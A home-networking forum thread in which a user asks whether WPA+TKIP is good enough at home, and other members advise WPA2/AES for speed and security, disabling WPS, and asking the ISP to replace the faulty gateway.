WPA2+AES overkill as compared to WPA+TKIP for general Home use ?

[pfm]

I know WPA2+AES would be best for security and I would just go with that, I always have, but recently I switched my isp and the modem+router gateway they gave me is terrible at performance and connectivity with wpa2+aes but works fine with wpa+tkip.
This is about home which is far from a corporate data mine with other people's personal information at stake for which you could be sued for millions or go out of business. There would be no "network storage" hooked up to this home network either.

So that made me wonder - is wpa+tkip all that bad for just general home use ? like streaming video, audio, games, browsing and perhaps online banking and taxes and online shopping.

Since we are talking about "wifi" security obviously someone would have to be within close range of the router like sit outside my home and do anything if they wanted to. What are the chances of that ? Its not like I live in a parking lot.

Finally (sorry I know this is getting longer than I thought it would) my point is - there is always "ultimate" security available. Google might (and should) put four steel doors with seven locks on each but would you do that for your patio door even if you could ?

{edit:} Anyone know if it has ever happened that a wpa+tkip secured home network was broken into ?

Your thoughts and opinions are welcome and highly appreciated.
Thanks!

 

[RogerSC]

I would be motivated to make WPA2/AES work...take a look at this article to see why:

http://www.smallnetbuilder.com/wireless/wireless-basics/30664-5-ways-to-fix-slow-80211n-speed

Using WPA/TKIP you can't get your wireless to go any faster than 54Mbps, which is pretty slow these days. Wireless-n can go up to about 450Mbps with the right hardware, and wireless-AC much faster, about 1300Mbps, also with the right hardware...but you need WPA2/AES to get above 54Mbps at all.

 

[TonyH]

Hi,
For security and speed there is no such thing as overkill. Always underkill, LOL! Same goes for safety, no such thing as too much safety as far as I am concerned.

 

[RMerlin]

Consider the fact that wireless signals are broadcast at large, and therefore accessible by anyone on the street. Failing to apply basic security measures such as WPA2/AES can result in your POP3 login info being stolen by someone just passing by on the street, for example (very few people actually use TLS/SSL when connecting to their email server).

 

[htismaqe]

I would be motivated to make WPA2/AES work...take a look at this article to see why:

http://www.smallnetbuilder.com/wireless/wireless-basics/30664-5-ways-to-fix-slow-80211n-speed

Using WPA/TKIP you can't get your wireless to go any faster than 54Mbps, which is pretty slow these days. Wireless-n can go up to about 450Mbps with the right hardware, and wireless-AC much faster, about 1300Mbps, also with the right hardware...but you need WPA2/AES to get above 54Mbps at all.

I was going to post something along these lines.

To get truly high speed wireless you HAVE to use WPA2/AES.

 

[L&LD]

Even without the speed hit, WPA is equivalent as not securing your network at all.

In January 2012 a post (different forum) was made that with a then six year old MacBook Pro, the password was cracked in 2.5 hours.

Translated to a current laptop in May 2014: less than a minute to get inside.

 

[sfx2000]

I know WPA2+AES would be best for security and I would just go with that, I always have, but recently I switched my isp and the modem+router gateway they gave me is terrible at performance and connectivity with wpa2+aes but works fine with wpa+tkip.
This is about home which is far from a corporate data mine with other people's personal information at stake for which you could be sued for millions or go out of business. There would be no "network storage" hooked up to this home network either.

So that made me wonder - is wpa+tkip all that bad for just general home use ? like streaming video, audio, games, browsing and perhaps online banking and taxes and online shopping.

Since we are talking about "wifi" security obviously someone would have to be within close range of the router like sit outside my home and do anything if they wanted to. What are the chances of that ? Its not like I live in a parking lot.

Finally (sorry I know this is getting longer than I thought it would) my point is - there is always "ultimate" security available. Google might (and should) put four steel doors with seven locks on each but would you do that for your patio door even if you could ?

{edit:} Anyone know if it has ever happened that a wpa+tkip secured home network was broken into ?

Your thoughts and opinions are welcome and highly appreciated.
Thanks!

Honestly, this doesn't make sense... but we only have half of the scenario/use case...

All modern WiFi chipsets do AES/WPA2 in a dedicated logic block on the wifi chipset, this has been so for some time - basically it's done in Hardware, so it should be totally transparent.

Some older 802.11b/g/a chipsets - they support WPA and WPA2, but they do it in SW, at a significant performance penalty - but again, this is an outlier as most 802.11g chipsets since about '09 or so again, have WPA2 support in HW...

To be helpful here - provide the Chipset, Driver, and host OS, then folks might be able to provide more assistance.

WPA2/AES is the best course here, for security as well as performance in 802.11n space.

sfx

 

[pfm]

so explain to me - what does "get inside" mean ? Meaning they can use my wifi for internet ? or get into the router as 'admin' change settings ? or get into a computer connected to the network and open or copy files out ?

good point on the speed but the sad irony is that because of this lousy pos gateway that comcast has sent me trips over itself when using wpa2/aes. I have to use wap/tkip to maintain wifi peace in the house.

{edit:} sfx2000, saw your post after I replied. It is an ARRIS TG862G. I dont know which version exactly but I can find out.

 

[azazel1024]

As to your question, all of the above.

Simply translating all of the traffic over your WLAN won't just let them waltz in to any computer they want, but it is the critical first step to doing it and generally since it is on the local network then, it is much easier to do whatever they want (IE there isn't that much security once you are on the internal network).

Ask for a new cable modem/router combo. If it is ancient, they should give you one. You ARE renting it I assume, therefore you should demand something better for them since you are paying for it.

Also for distance, your WLAN might only be "readable" at a couple of hundred feet on something like a regular laptop, but just stick a high gain antenna on there, even if you don't have one on your end, and you can read a wifi network easily from half a mile or more if you have line of site to it.

Doesn't make it likely that someone would ever do that...but it also isn't that likely that someone is going to try your windows and doors to see if they are unlocked to break in to your house.

I still lock my windows and doors when I am not home.

Even WPA2/AES is breakable given time and motivation, but it generally takes a LOT of time and motivation to be able to do it. WPA2/TKIP and other lesser encryption forms take minutes with a resonably new computer to break the encryption. WPA2/AES is more like 24+hrs of listening in (more for association chatter than anything) to have a chance of breaking it. If there isn't a lot of assocation chatter on your network and you used a sufficiently long and complex wifi password odds are excellent that it might even take weeks to crack your WPA2/AES WLAN encryption.

Things like WPS make it even faster, which is why you NEVER EVER want to use WPS. With WPS enabled you can often break the encryption in minutes rather than days if you have WPA2/AES. WEP is just a joke. That is practically seconds these days with a newer computer.

 

[htismaqe]

Ask for a new cable modem/router combo. If it is ancient, they should give you one. You ARE renting it I assume, therefore you should demand something better for them since you are paying for it.

This.

It sounds to me like the device they gave you is malfunctioning. Call them and tell them you want it replaced. Tell them that compromising your personal security isn't something you're willing to do.

 

[pfm]

one followup question - if the router has both wpa and wpa2 enabled, as well as aes and tkip enabled and I use all my devices with wpa2/aes except say one - like a TV or Roku or such - then am I still exposing all devices on the network to risk ? even though only one device is using the less secure connection ?

 

[chadster766]

Typically the wireless encryption has very little effect on throughput with modern routers. WPA2 in either flavor is fine.

 

[htismaqe]

one followup question - if the router has both wpa and wpa2 enabled, as well as aes and tkip enabled and I use all my devices with wpa2/aes except say one - like a TV or Roku or such - then am I still exposing all devices on the network to risk ? even though only one device is using the less secure connection ?

Yep.

Your router is only as secure as the weakest link.